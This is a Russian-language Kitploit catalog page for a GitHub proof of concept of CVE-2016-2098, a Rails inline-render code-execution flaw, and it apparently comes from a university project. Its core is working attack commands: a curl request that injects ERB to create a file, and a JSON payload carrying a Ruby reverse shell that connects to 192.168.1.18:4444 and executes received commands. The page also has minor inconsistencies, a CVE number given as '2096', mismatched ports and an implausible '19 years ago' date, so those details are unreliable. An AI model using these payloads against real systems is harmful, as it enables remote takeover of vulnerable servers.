Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
rails-PoC-CVE-2016-2098 — Доказательство концепции CVE-2016-2098 | Kitploit
Инструменты/GitHubGitHub/alejandro-marting/rails-poc-cve-2016-2098
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubalejandro-marting/rails-poc-cve-2016-2098

rails-PoC-CVE-2016-2098

Доказательство концепции CVE-2016-2098

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
19 лет назадЕщё не проверено

Доказательство концепции уязвимости: CVE-2016-2098

Университетский проект, созданный @alejandro-marting где мы можем проверить уязвимость 2096

Используя:

  • rails 4.2.5.1
  • представление содержит уязвимый код app/views/poc/render1.html.erb

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

##Выполнение: Сначала нужно запустить сервер rails следующей командой:

$ rvmsudo rails server -b 0.0.0.0 -p 80

Теперь мы можем вызвать удалённое выполнение кода следующей командой:

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(Должен быть создан файл rooted)

Если вы хотите попробовать обратную оболочку с внедрением ruby-кода, можете выполнить следующую команду:

root@kitploit:~
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

Если у вас есть вопросы, пожалуйста, свяжитесь со мной!

Скачать инструмент